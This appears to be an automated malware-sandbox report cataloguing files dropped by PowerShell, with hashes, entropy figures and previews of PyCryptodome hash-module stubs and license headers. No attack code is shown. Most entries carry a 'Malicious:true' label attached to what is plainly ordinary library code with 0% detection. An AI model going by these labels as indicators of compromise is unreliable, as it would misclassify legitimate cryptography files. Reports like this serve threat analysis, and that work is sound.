                                                                                                                                                                                                                              Preview:from typing import Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class KMAC_Hash(object):.... def __init__(self,.. data: Buffer,.. key: Buffer,.. mac_len: int,.. custom: Buffer,.. oid_variant: str,.. cshake: ModuleType,.. rate: int) -> None: ....... def update(self, data: Buffer) -> KMAC_Hash: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... mac_len: int = ...,... key: Buffer = ...,.. custom: Buffer = ...) -> KMAC_Hash: .........def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2980
                                                                                                                                                                                                                              Entropy (8bit):5.271012086144821
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Q9JuEAnxxh2wGl6mDxcUROfnSO6d2:MMDqrYJALrYJHdt3EHGuIWH9Ju5JQ66E
                                                                                                                                                                                                                              MD5:5D8FCE4FF68CED1B7951320BF774725A
                                                                                                                                                                                                                              SHA1:50F60C4DEC5C1CF84A2182347937673B8CDDEAEB
                                                                                                                                                                                                                              SHA-256:5DF6B48163BBBEA77D5B624E1E07B95F25390DB1430D45AD5CAB902E477A64A4
                                                                                                                                                                                                                              SHA-512:DB2ABAD56E2E426C7BDF3E6BAEDFD3EE390FF495A032CB8F0CAFC4DAF84166C388B5EA1CC70FE45518A4F640A65A407E0E857D61EEACFC85C7ACD5895D007AA9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):236
                                                                                                                                                                                                                              Entropy (8bit):4.806129043337596
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYB+1LWpVQ9zrIY3MTDyo5LwmLBysOL13yamLs/Ns:1REYBeh9vIY3YyoR3LB/Y3mLs1s
                                                                                                                                                                                                                              MD5:9BB92F855E03ADD802DAF8AFD8D46DD4
                                                                                                                                                                                                                              SHA1:2D8211D1408152634446F921611426687A6A8800
                                                                                                                                                                                                                              SHA-256:B220806E584FF8FA9C4A28733F1A096B631B700096020EADCF766B96F86A82E7
                                                                                                                                                                                                                              SHA-512:705206605980538F53A763410E8DB18EA03BBA2C204F8FDB2E723EB0EEBD9E1B252414D0EC2E092D46795E82BF61EA126B27CD40EFABC62BF6F0CD039313C43B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union....from .KMAC128 import KMAC_Hash....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. data: Buffer = ...,... mac_len: int = ...,.. custom: Buffer = ...) -> KMAC_Hash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7392
                                                                                                                                                                                                                              Entropy (8bit):4.848179526975703
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Nqrskrs9t3q/I86pj06gdE0Tq5/JPTZxl:krskrs9VqLwj0XzeL
                                                                                                                                                                                                                              MD5:B8FF8687616746E7D2B33FA0EFC8DECE
                                                                                                                                                                                                                              SHA1:32BA49FBF1FC3F036B99C2709515DC5ABC245C8B
                                                                                                                                                                                                                              SHA-256:1F06117B8FB243148DA2689A76B39F88797D3A7A797A3363792D3D30D0FE06D0
                                                                                                                                                                                                                              SHA-512:61C95FDB308FB6D2F822C5E1B9244D0583FDB636ABF47739492550C677D87DF9E7E28DF3B9CF051C565A5B93C946E13C974C3B4F0BA12541D6DDBC801C40E4C8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):588
                                                                                                                                                                                                                              Entropy (8bit):4.505456264915036
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3vJ1ApWaNaFeLsQwRh72CX5BfWaNaFeLsXJaNi4j:1REcT3rA1Npuh717NpsENiS
                                                                                                                                                                                                                              MD5:42C9FEC1BF1C0D408407E53932837C93
                                                                                                                                                                                                                              SHA1:12F0171C79E934BF9202A864E6D87404EBDB1BDE
                                                                                                                                                                                                                              SHA-256:4C18BD17FAE1D883D8710836B105100A6732AEF4639967F09FD1B7BD636E21B0
                                                                                                                                                                                                                              SHA-512:9FC2C7FBFE0D15D327D6155DDB6613C1BDFC966E7BD2EC0D50CAE0DE981F5A1752B4A303EDFD9D87D68C7A0B2026E082B7F3DD3B40F8426B5CF9E0CF48A64723
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class K12_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> K12_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> K12_XOF: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6277
                                                                                                                                                                                                                              Entropy (8bit):4.740289678626214
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWHgkIx9LSVHSvtNz8iz1I7NHZDE3aOMz/fXqNagW6:9qrskrs9t3q/IN9L8i4NmKpfLI
                                                                                                                                                                                                                              MD5:E481D6B8F9367485C21BE80F7EA069C9
                                                                                                                                                                                                                              SHA1:3D3F67C2664934CF57C9705DBAC3B48A8DFF15B5
                                                                                                                                                                                                                              SHA-256:2B2CB2D01B12395DDBEA6EC5D66E3CDC8FD5B99BCB81E112FE127299EE24922C
                                                                                                                                                                                                                              SHA-512:3C215DF463DDAB0CE241F0898FF6005FC87C61E1249051876D05495AE3619569B18CB917AB9FEE194AFE73698CFCAFA4FC662617E22F17757063C978687B1B1C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):511
                                                                                                                                                                                                                              Entropy (8bit):4.765158993873355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBjvIY3g2RypRyLu1AwLsQwu5LGLs+4Ls7Ry5Ryn:1REET3g2QEWAwL/0Lz4Lcwy
                                                                                                                                                                                                                              MD5:4BC02D61022F9C16DF722B5F84952EE6
                                                                                                                                                                                                                              SHA1:C1AC7927C7F367E0ED86236950DC2966326B127C
                                                                                                                                                                                                                              SHA-256:3B3C9E78A4313AC9D7935D4AE92C650879BE8F55007478154429919B4794BB42
                                                                                                                                                                                                                              SHA-512:9A6729A4346430DAB7D125D5575C955B968B2491F37C75F9ECE46A13A0DA794348F86227EC29A0D700CB5B66F76353D4372439D9EE956DFC43CEF75B62EA9251
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Buffer = ...) -> MD4Hash: .......def new(data: Buffer = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6767
                                                                                                                                                                                                                              Entropy (8bit):4.77561272659047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MwDqrYJALrYJHdt3EHGuIuyHgkIc+VpFfjlBPazI1i4a9m2gNeJ3JOMTRt/XklO/:9qrskrs9t3q/IuHJbD62itgGZ3FWtA
                                                                                                                                                                                                                              MD5:815AD75FFCEB01DBC18A797BEB80D57E
                                                                                                                                                                                                                              SHA1:90AEFD81B088EC63E771C502377380B5A83AAB0A
                                                                                                                                                                                                                              SHA-256:26196B146E61C65278C91C066B7460FEBC3200DC14FB5E842C471E6D56C39783
                                                                                                                                                                                                                              SHA-512:2025D72689B0A4CF2B1B30BAD9593DF40EB632C20628916F7141832930D6F42FEE3E79B951620A161B19213C18E4E5C1C5A1EC946B4F68E0911A9FB636D0E4ED
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):551
                                                                                                                                                                                                                              Entropy (8bit):4.846633197285402
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
                                                                                                                                                                                                                              MD5:74AB60EEF22557EA93605E680CA5D294
                                                                                                                                                                                                                              SHA1:6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
                                                                                                                                                                                                                              SHA-256:0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
                                                                                                                                                                                                                              SHA-512:F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6802
                                                                                                                                                                                                                              Entropy (8bit):4.584130593682968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dFQHvo7H1kIcKxYHSvtZzUwipIDwNHiw3aOMzCkDXXgcNdymaZ/HSxUY59Rk:bQHvLSrifNBKoknPDdzRk
                                                                                                                                                                                                                              MD5:9B5CEA3FA09AFC6A601C87474223CF35
                                                                                                                                                                                                                              SHA1:2D5EFB95669296497442EFBD696460F2049D3FA6
                                                                                                                                                                                                                              SHA-256:5B3966F7457DB844BE069E442139F2863B2407D9C803EDCA064CE878BBD263E5
                                                                                                                                                                                                                              SHA-512:3C989A5974DECE408C53EF69F45C4003DA506FE681C1196B29C7F9F5A4FC97264C39272952256BB7C8ACAFD9D2F7E783F815D8AD3E0AA97573F11103F13786A6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):511
                                                                                                                                                                                                                              Entropy (8bit):4.765158993873355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
                                                                                                                                                                                                                              MD5:1F1147ECB293220FC948730F06836366
                                                                                                                                                                                                                              SHA1:E467DEF3A20461383919E11A801E0B57BBDC85E6
                                                                                                                                                                                                                              SHA-256:8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
                                                                                                                                                                                                                              SHA-512:762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8291
                                                                                                                                                                                                                              Entropy (8bit):4.581460307129591
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vkJbFQHvo7EHgSrkIp2iliiM/QpkFLwZD42MzZFEtP2CTHOV:cJJQHv3ViiRM8Zszze+WOV
                                                                                                                                                                                                                              MD5:041E76ED0853FC3D34926662B89C7EC9
                                                                                                                                                                                                                              SHA1:C96F71E6A2A302C9A275F88FB524767D3953004C
                                                                                                                                                                                                                              SHA-256:F837E4153ED4E178F518F71A87315C172C3B60CB4F132A6F19F68AF9BCA336F7
                                                                                                                                                                                                                              SHA-512:9C6DF959510E2D2ABA4A9808E62288A74FE225911AFD854B85A8345A25131F352504F9176E3F290FC99A61B04E21A1C08531FF45D8CD3D348DEF74E70458B0D3
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Hash/Poly1305.py - Implements the Poly1305 MAC..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):689
                                                                                                                                                                                                                              Entropy (8bit):4.617411626220112
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
                                                                                                                                                                                                                              MD5:75346EDCB93D820A434DB03BE87622A5
                                                                                                                                                                                                                              SHA1:47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
                                                                                                                                                                                                                              SHA-256:7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
                                                                                                                                                                                                                              SHA-512:0F1CA6D6FCC2176B6F8FC7849CF5E14C77109CD92C690B81EC796F204ACADF69F3AD444F674EC3D751CAB4A959232F2BAF6D5E65D4BB174B1C5115A8EF413E1B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class Poly1305_MAC(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. r : int,.. s : int,.. data : Buffer) -> None: ..... def update(self, data: Buffer) -> Poly1305_MAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .......def new(key: Buffer,.. cipher: ModuleType,.. nonce: Buffer = ...,.. data: Buffer = ...) -> Poly1305_MAC: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1225
                                                                                                                                                                                                                              Entropy (8bit):5.174131605423868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FbUgtQ+5VYGtQq+tQke:KIB0jcQHMsvI/S3oCFbn5DB+o
                                                                                                                                                                                                                              MD5:CB30EA21F8B046CCE596D4E9D85D2C36
                                                                                                                                                                                                                              SHA1:39A1CFA3C5664E638359F8EBB44CC8BE70D96125
                                                                                                                                                                                                                              SHA-256:E811E75C7B6A01CDFAF40C3EF330BDAF01EDD45AAF449396A669EB1FF78C8CC6
                                                                                                                                                                                                                              SHA-512:9DF776A64BE9A1C0405C29C3B5E41295EF558741F9695B6C968ECE87354099F12B490A1B125D0CF778992404F92ECF3C3DEFD854E9DB4C6B31B13C1B4ADEA5D9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                              Entropy (8bit):4.494398793678958
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTv:SbFsmK2lfWr3SsBktxTv
                                                                                                                                                                                                                              MD5:37FCCB2128F28CB860905F19A5DE5664
                                                                                                                                                                                                                              SHA1:E195627D9120B8DF358962BFE57EB1AF121510A7
                                                                                                                                                                                                                              SHA-256:4E4A85E6BC544386180FAAB57B719D40C8B07D04FF1AD0A222AEDEFD81A29DD4
                                                                                                                                                                                                                              SHA-512:A33C96C3A508D2C288E34036AD8F5748BC8993BC08D33785E554553E99A7E4818F853593E8D6695F4BA936B528748E96BF2969B616302F3B6AB4DBF7B08EBE6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6567
                                                                                                                                                                                                                              Entropy (8bit):4.770780657565152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWHgkInaAHSvw5zbixIwNHZ3aOMmkXX4NUjfj:9qrskrs9t3q/IDJbiXN5KoknNP
                                                                                                                                                                                                                              MD5:294D8E4BD1689A8559B935B6D234F5F1
                                                                                                                                                                                                                              SHA1:23F0157DBFF6D5A4339E66FA0526C38CF3C91CB0
                                                                                                                                                                                                                              SHA-256:CBCCB75E5F0647E5C18B743266D00300EEA5D15D164E3008ACBD934894A4AB43
                                                                                                                                                                                                                              SHA-512:2D39E18D2C36E72B0CF236E7FFA0C37857B5EB5304CD96CFCBD214B5CA676AFA4A0C377C80C028163FAF53E9D7400E3598F4BD21C36DDD95AEE42A22BE657710
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):535
                                                                                                                                                                                                                              Entropy (8bit):4.931502616073856
